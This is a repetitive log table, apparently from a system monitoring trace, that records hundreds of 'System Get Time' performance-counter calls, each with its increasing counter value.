| System | Get Time | type = Performance Ctr, time = 23023904162 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23023916802 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23025446079 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23025461719 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23028561918 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23028574335 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23031696847 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23031712951 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23034870394 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23034887897 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23037943072 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23037959229 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23041062514 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23041075023 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23044197915 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23044213950 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23045785528 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23045801955 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23048889301 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23048906006 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23052013287 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23052029576 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23055138392 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23055150957 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23058279606 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23058291657 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23059814537 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23059826689 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23061385557 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23061400622 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23064519353 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23064535643 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070486892 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070509103 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070540862 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070558054 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070766049 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23070783741 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23073900576 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23073917775 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23077016772 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23077033875 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23078567617 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23078583743 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23080150279 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23080166769 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23083274009 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23083289809 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23086380941 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23086393390 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23087940134 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23087952723 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23091067354 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23091080179 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23092646621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23092659052 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23094188956 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23094201213 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23095762736 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23095774979 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23098882066 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23098894638 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23100443952 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23100459870 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23103588659 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23103602573 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23106687308 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23106699633 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23109816921 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23109832897 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23112945307 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23112957811 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23124351215 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23124367099 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23127004510 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23127017280 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23128576432 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23128589447 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23131691784 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23131705923 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23134859374 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23134872373 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23136383408 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23136396628 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23139688750 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23139707620 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23142641256 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23142657316 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23145782902 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23145795254 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23148878286 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23148891005 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23150435459 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23150448033 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23152005041 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23152017287 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23155136252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23155148723 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23158287789 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23158300311 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23161382791 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23161395673 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23164504871 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23164517908 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23167633572 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23167646586 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23170762774 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23170775662 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23172500808 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23172517969 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23175486450 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23175499448 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23177013266 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23177027554 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23178609837 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23178626027 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23183773686 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23183786382 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23184824376 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23184836979 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23187951349 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23188111209 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23189630999 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23189648075 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23197414381 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23197431103 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23197499187 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23197515395 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23198970051 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23198990060 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23202041455 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23202058528 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23220869369 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23220881949 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23223894660 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23223908826 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23225477906 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23225490712 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23298143286 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23298160372 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23298410503 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23298424352 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23300448210 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23300461444 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23302016969 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23302029821 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23305109738 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23305128102 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23306762856 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23306775816 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23357188002 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23357204333 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23358349348 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23358366035 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23358390792 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23358405743 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23359902396 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23359918401 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23363021927 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23363037656 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23366187446 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23366203668 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23369279471 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23369297783 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23372409899 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23372426071 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23373975981 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23373992355 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23377120452 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23377136331 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23378659199 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23378675043 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23380289643 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23380305812 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23383347215 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23383363258 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23384905021 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23384920907 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23388050342 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23388066419 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23391151527 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23391167011 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23392732130 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23392747230 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23394278678 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23394293855 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23397392598 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23397407927 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23400688148 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23400705879 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23402109180 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23402125218 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23405238851 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23405254982 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23406779219 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23406794316 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23408445244 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23408461209 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23411479263 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23411493646 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23418409184 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23418428638 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23418458016 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23418469577 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23419278811 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23419291401 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23420844991 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23420860135 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23423969935 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23423986602 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23425542014 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23425557557 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23428681671 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23428694881 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23430219916 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23430235420 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23433328831 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23433341354 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23434902955 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23434916034 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23438044188 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23438058068 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23508501434 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23508516348 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23513748307 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23513762988 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23513787645 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23513797931 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23514585735 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23514599594 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23516158481 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23516170888 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23517755270 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23517769953 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23520835424 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23520849620 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23522410770 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23522425592 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23525533885 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23525543645 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23528662515 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23528677475 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23530221396 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23530236515 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23533337359 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23533351484 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23534930220 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23534944504 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23536464493 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23536476999 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23539609099 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23539623546 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23542719748 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23542734987 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23544287726 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23544302476 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23547416911 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23547431940 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23550559207 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23550574248 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23553718053 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23553733134 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23555214777 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23555226828 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23558345224 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23558359822 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23559918260 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23559932238 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23563035962 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23563051412 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23564647609 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23564661491 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23567726622 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23567737136 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23569273774 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23569286500 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23571128689 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23571142664 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23573972691 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23573986387 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23575527135 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23575541278 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23578656001 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23578669995 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23583248421 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23583262801 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23583339847 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23583351548 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23586471766 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23586485642 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23588029811 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23588044644 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23589598297 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23589612212 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23592723087 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23592737764 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23595848842 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23595863739 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23598964604 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23598977197 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23602088694 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23602101308 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23603877005 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23603891176 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23606777943 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23606789874 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23610135075 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23610147634 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23613027248 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23613040329 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23616166403 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23616175327 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23619275619 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23619287853 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23620842409 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23620855503 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23623957177 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23623970324 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23625525194 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23625534808 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23628652528 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23628664826 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23631773808 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23631786792 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23633330783 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23633343423 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23634917967 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23634930806 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23638045018 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23638057369 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23639581250 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23639593679 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23641160098 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23641173900 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23642715776 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23642727382 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23645836681 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23645848669 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23647415284 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23647423923 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23649214996 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23649226313 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23652091196 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23652104186 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23653645508 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23653658280 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23655225778 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23655240288 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23658342624 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23658355736 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23659908202 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23659921291 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23663027150 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23663042334 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23666156084 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23666168392 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23667722639 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23667735311 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23670852785 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23670867701 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23673970152 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23673984289 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23677090150 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23677105413 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23682159180 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23682175665 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23683338827 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23683355753 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23686462783 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23686477568 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23688224575 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23688235592 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23691152299 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23691161336 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23692723981 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23692736023 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23695830228 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23695842991 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23697403537 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23697416000 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23700525150 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23700534047 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23703663803 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23703675740 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23705210572 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23705226416 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23708838829 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23708851813 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23709917074 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23709930976 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23713025997 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23713038502 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23716158281 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23716173584 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23717714694 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23717729193 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23719281558 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23719296700 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23720966736 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23720980618 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23723969241 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23723984525 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23727094450 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23727109527 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23728656929 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23728671616 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23731774997 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23731790157 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23733347488 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23733363263 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23736492300 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23736507708 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23738037563 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23738052231 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23831217632 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23831230962 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23838454431 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23838468064 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23838487975 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23838498323 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23841148052 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23841161192 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23844270423 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23844298476 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23845845600 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23845862480 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23848953478 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23848967112 |
|
1 | |
